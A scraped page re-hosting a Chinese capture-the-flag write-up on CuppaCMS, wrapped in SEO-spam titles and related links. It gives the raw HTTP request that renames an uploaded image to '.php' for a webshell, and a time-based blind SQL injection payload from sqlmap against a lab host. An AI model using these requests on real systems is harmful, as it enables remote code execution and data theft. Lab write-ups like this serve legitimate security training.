当前位置：首页 > news >正文

什么外贸网站开发客户/哪些网站可以seo

news 文章来源：https://blog.csdn.net/lkbzhj/article/details/139999010 2025/3/13 3:52:17

什么外贸网站开发客户,哪些网站可以seo,在哪个网站做流动补胎的广告好,东莞哪家网站建设好简介 CuppaCMS是一套内容管理系统（CMS）。 CuppaCMS 2019-11-12之前版本存在安全漏洞，攻击者可利用该漏洞在图像扩展内上传恶意文件，通过使用文件管理器提供的重命名函数的自定义请求，可以将图像扩展修改为PHP&#xf…

简介

CuppaCMS是一套内容管理系统（CMS）。 CuppaCMS 2019-11-12之前版本存在安全漏洞，攻击者可利用该漏洞在图像扩展内上传恶意文件，通过使用文件管理器提供的重命名函数的自定义请求，可以将图像扩展修改为PHP，从而导致远程任意代码执行。

在/components/table_manager/路径下存在sql注入

过程

打开靶场

弱口令admin/admin 登录后台

找到文件上传位置，只允许上传图片

上传之后修改文件后缀为php，进行抓包

抓包数据如下

POST /js/filemanager/api/index.php HTTP/1.1
Host: eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com/js/filemanager/index.php
Content-Type: application/json
Content-Length: 59
Origin: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718849866,1718896116,1719242501,1719395363; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=688e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1719395439; country=us; language=en; PHPSESSID=0rvs895vqjskasibtukhf8m0a2; administrator_path=http%3A%2F%2Feci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com%2F; administrator_document_path=%2F
Priority: u=1{"from":"//asd.php.png","to":"//asd.php","action":"rename"}

修改成功之后放包，修改成功，要删掉.htaccess文件，然后使用蚁剑连接

得到flag{047b0831-949e-41f3-84f1-49859eb6bebf}

附加

在测试的过程中发现还存在一个sql注入漏洞

找到Permissions-Group，在搜索处搜索并进行抓包

抓包数据如下

POST /components/table_manager/ HTTP/1.1
Host: eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 150
Origin: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com/
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718849866,1718896116,1719242501,1719395363; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=688e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1719395439; country=us; language=en; PHPSESSID=0rvs895vqjskasibtukhf8m0a2; administrator_path=http%3A%2F%2Feci-2ze48eddxtrl7tgppkyz.cloudeci1.ichunqiu.com%2F; administrator_document_path=%2F
Priority: u=1search_word=123&filter_language=&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_menus&uniqueClass=wrapper_content_897880

丢到sqlmap中运行

得到payload

search_word=123&filter_language=' AND (SELECT 5543 FROM (SELECT(SLEEP(5)))JJri) AND 'XiZL'='XiZL&order_by=id&order_orientation=ASC&path=component/table_manager/view/cu_menus&uniqueClass=wrapper_content_897880

爆出数据库如下

爆表

并没有发现flag，就没有继续测试。

什么外贸网站开发客户/哪些网站可以seo

简介

过程

附加

相关文章：

CVE-2020-26048（文件上传+SQL注入）

【面试题】信息系统安全运维要做什么

引导过程与服务器控制

前置章节-熟悉Python、Numpy、SciPy和matplotlib

在Ubuntu上安装和配置配置服务器防火墙（CSF）的方法

Python-井字棋

39.客户端与服务端断开事件handler

SSL 之 http只用crt格式证书完成SSL单向认证通信

实训作业-人事资源管理系统

Flink 资源静态调度

upload-labs第十三关教程

基于springboot实现宠物商城网站管理系统项目【项目源码+论文说明】计算机毕业设计

Fragment与ViewModel（MVVM架构）

Linux开发讲课16--- 【内存管理】页表映射基础知识2

uniapp地图点击获取位置

Unity程序开发：1.基本概念及操作

前端新手小白的第一个AI全栈项目---AI聊天室

金升阳电源被制裁，广州顶源电源模块可以完美替换

《数据赋能：一本书讲透数字化营销与运营》—— 从正确的数据观开始

JDK 24：Leyden

对于图片转3d人脸方面的研究

.NET C# 八股文代码阅读（一）

C++用Crow实现一个简单的Web程序，实现动态页面，向页面中输入数据并展示

南信大尹志聪教授为一作在顶级综合性期刊《Natl. Sci. Rev.》发文：传统梅雨停摆，江南缘何不再多烟雨？

程序员如何用ChatGPT解决常见编程问题：实例解析

初识 SpringMVC，运行配置第一个Spring MVC 程序

STM32F1+HAL库+FreeTOTS学习1——FreeRTOS入门

杭州代理记账报税全程托管专业实力全面指南

PHP 界的扛把子 Swoole 异步通信利器

40.连接假死-空闲检测-发送心跳